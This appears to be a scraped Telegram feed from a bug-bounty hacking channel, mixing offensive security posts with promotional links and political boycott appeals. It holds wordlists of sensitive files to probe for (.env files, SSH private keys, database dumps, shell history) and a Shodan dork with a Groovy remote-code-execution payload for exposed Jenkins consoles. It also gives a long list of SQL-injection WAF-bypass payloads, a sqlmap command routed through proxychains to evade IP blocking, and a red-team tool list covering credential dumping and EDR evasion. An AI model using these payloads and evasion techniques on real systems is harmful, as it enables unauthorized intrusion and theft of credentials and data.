Important environment files and variables
.env
.env.local
.env.dev
.env.production
.env.staging
.env.testing
.env.example
.env.backup
.env.bak
.env.old
.env~
.env.default
/opt/app/.env
/home/user/.env👍10❤2
Backup files and old versions
index.php.bak
config.old
config.bak
database.sql.gz
database_backup.sql
database_dump.sql
database_export.sql
wp-config.php~
.htpasswd.bak
.htpasswd.old
.htaccess.bak
.htaccess.old
admin.bak
backup.zip
backup.tar.gz
backup.sql
backup_old.sql
old_version.zip
old_config.php
👍12❤3
Log and debug files
debug.log
error.log
access.log
server.log
php_errors.log
trace.log
system.log
log.txt
logs/debug.log
logs/error.log
logs/system.log
logs/app.log👍10❤3
Private key files and API keys
id_rsa
id_rsa.pub
id_dsa
id_ecdsa
id_ed25519
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/authorized_keys
secrets.json
apikey.txt
google-cloud.json
aws-credentials
jwt_private.pem
jwt_public.pem
private.key
public.key👍12❤5
Miscellaneous files worth testing
composer.lock
composer.json
package.json
package-lock.json
.bash_history
.bashrc
.zshrc
.gitignore
.gitconfig
.gitattributes
.idea/workspace.xml
.vscode/settings.json
.vscode/launch.json
.vscode/tasks.json
Dockerfile
docker-compose.yml
nginx.conf
apache2.conf
httpd.conf
php.ini
robots.txt
sitemap.xml
sitemap_index.xml
crossdomain.xml
security.txt
CORS⚡9👍5🔥4❤3
Exploit RCE via Groovy Console
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
hashtag#BugBounty hashtag#bugbountytips hashtag#RCE
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
hashtag#BugBounty hashtag#bugbountytips hashtag#RCE
👍25🔥7❤2
hello everyone use this my custom and advance Recon Eging
https://haxshadow.github.io/reconengine/
https://haxshadow.github.io/reconengine/
6🔥39❤6👍3🫡3🥰1
Bypass SQL union select
#Bypass #SQL
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
❤16👍6
Master Wordpress Penetration Testing.pdf
6 MB
🔍 Master WordPress Penetration Testing – Secure & Exploit Like a Pro! 💻🚀
🔹 Learn How to Identify & Exploit WordPress Vulnerabilities! ⚡️
🔹 Master Enumeration, Brute-Force Attacks, Plugin Exploits & More! 🔥
🔹 Understand WordPress Security Best Practices & Hardening Techniques! 🎯
🔹 Essential for Ethical Hackers, Bug Bounty Hunters & Pentesters! 🛠
📖 Expand Your Pentesting Skills!
👉 Complete List of Pentesting & Hacking Tools: https://www.codelivly.com/complete-list-of-penetration-testing-and-hacking-tools
👉 Learn Web Application Pentesting: https://www.codelivly.com/learn-web-app-pentesting/
👉 Hacking Like a Pro – Penetration Testing with Kali Linux: https://www.codelivly.com/hacking-like-a-pro-the-ultimate-guide-to-penetration-testing-with-kali-linux-tools/
🚀 Test Smarter, Hack WordPress & Stay Ahead in Cybersecurity!
🔹 Learn How to Identify & Exploit WordPress Vulnerabilities! ⚡️
🔹 Master Enumeration, Brute-Force Attacks, Plugin Exploits & More! 🔥
🔹 Understand WordPress Security Best Practices & Hardening Techniques! 🎯
🔹 Essential for Ethical Hackers, Bug Bounty Hunters & Pentesters! 🛠
📖 Expand Your Pentesting Skills!
👉 Complete List of Pentesting & Hacking Tools: https://www.codelivly.com/complete-list-of-penetration-testing-and-hacking-tools
👉 Learn Web Application Pentesting: https://www.codelivly.com/learn-web-app-pentesting/
👉 Hacking Like a Pro – Penetration Testing with Kali Linux: https://www.codelivly.com/hacking-like-a-pro-the-ultimate-guide-to-penetration-testing-with-kali-linux-tools/
🚀 Test Smarter, Hack WordPress & Stay Ahead in Cybersecurity!
❤19👍5
HackTheBox Certified Penetration Tester Specialist Cheatsheet
https://github.com/zagnox/CPTS-cheatsheet
https://github.com/zagnox/CPTS-cheatsheet
GitHub
GitHub - zagnox/CPTS-cheatsheet: HackTheBox Certified Penetration Tester Specialist Cheatsheet
HackTheBox Certified Penetration Tester Specialist Cheatsheet - zagnox/CPTS-cheatsheet
❤13🔥4
ModSecurity WAF are so easy to Bypass !
i used proxychains bcz site blocking my ip in just few attempt..
proxychains sqlmap -u 'url' --random-agent --batch --dbs --level 3 --tamper=between,space2comment --hex --delay 5
i used proxychains bcz site blocking my ip in just few attempt..
proxychains sqlmap -u 'url' --random-agent --batch --dbs --level 3 --tamper=between,space2comment --hex --delay 5
1👍29🤡5❤4🤮4💩2🥰1🍌1
XSS Hunting with Burp Suite: A Practical Guide:
https://youtu.be/qucdQ7kWHB4?si=fKT6tkTqyTTLKYv5
https://youtu.be/qucdQ7kWHB4?si=fKT6tkTqyTTLKYv5
YouTube
XSS Hunting with Burp Suite: A Practical Guide
🔍 XSS Hunting with Burp Suite: A Practical Guide
Are you ready to master Cross-Site Scripting (XSS) hunting? In this video, I’ll walk you through the step-by-step process of manually discovering XSS vulnerabilities using Burp Suite and how to automate the…
Are you ready to master Cross-Site Scripting (XSS) hunting? In this video, I’ll walk you through the step-by-step process of manually discovering XSS vulnerabilities using Burp Suite and how to automate the…
1👍21
𝐑𝐞𝐝 𝐓𝐞𝐚𝐦 𝐓𝐨𝐨𝐥𝐬 🔥
🔴 RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com
🔴 INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
🔴 DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
🔴 COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
🔴 CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
🔴 PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
🔴 DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
🔴 RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com
🔴 INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
🔴 DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
🔴 COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
🔴 CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
🔴 PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
🔴 DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
👍17🔥9❤7👎3💩2🍌1
🕊 Peace for Palestine
No more bloodshed. No more war.
We stand with the innocent lives affected by conflict.
Raise your voice for humanity, for justice, and for peace.
No War Please!!!
✊🏼💚❤️🤍
#PeaceForPalestine #FreePalestine #NoWar #StandForHumanity #StopTheViolence #SaveGaza #PrayForPalestine
No more bloodshed. No more war.
We stand with the innocent lives affected by conflict.
Raise your voice for humanity, for justice, and for peace.
No War Please!!!
✊🏼💚❤️🤍
#PeaceForPalestine #FreePalestine #NoWar #StandForHumanity #StopTheViolence #SaveGaza #PrayForPalestine
10❤86🕊16💩13🔥3🙏3💯2🤝1🗿1
It is not possible to damage a cyber power like Israel by taking down a couple of cyber attacks or useless websites.
So I would like to request everyone outside the tech field to boycott Israel completely both in the online world and offline. Through this, it is possible to break them financially. Stop using not only their online projects but also all their big services starting from online marketplaces. For example:
1. Fiverr
2. wix
3. Viber
4. Taboola
5. SimilarWeb
6. Vdoo
7. eToro
8. OutCrowd
9. Outbrain
10. Waze
We use many of these services and there are many more. We will completely refrain from using all these services from today.
So I would like to request everyone outside the tech field to boycott Israel completely both in the online world and offline. Through this, it is possible to break them financially. Stop using not only their online projects but also all their big services starting from online marketplaces. For example:
1. Fiverr
2. wix
3. Viber
4. Taboola
5. SimilarWeb
6. Vdoo
7. eToro
8. OutCrowd
9. Outbrain
10. Waze
We use many of these services and there are many more. We will completely refrain from using all these services from today.
❤20🤡10🔥9👍1👎1💯1
I new video upload go to my new telegram channel: https://t.iss.one/haxshadow
Title: Exposing Hidden API Keys with Web Scraping | Bug Bounty Recon Technique
Title: Exposing Hidden API Keys with Web Scraping | Bug Bounty Recon Technique
Telegram
HaxShadow
NO ONE HACK US !! JOIN US TO LEARN BUG BOUNTY
🔥9👍4
This is my Group add this
https://t.iss.one/shdowgp
https://t.iss.one/shdowgp
Telegram
Haxshadow👾 Chat
This is a Group ..
❤6👍1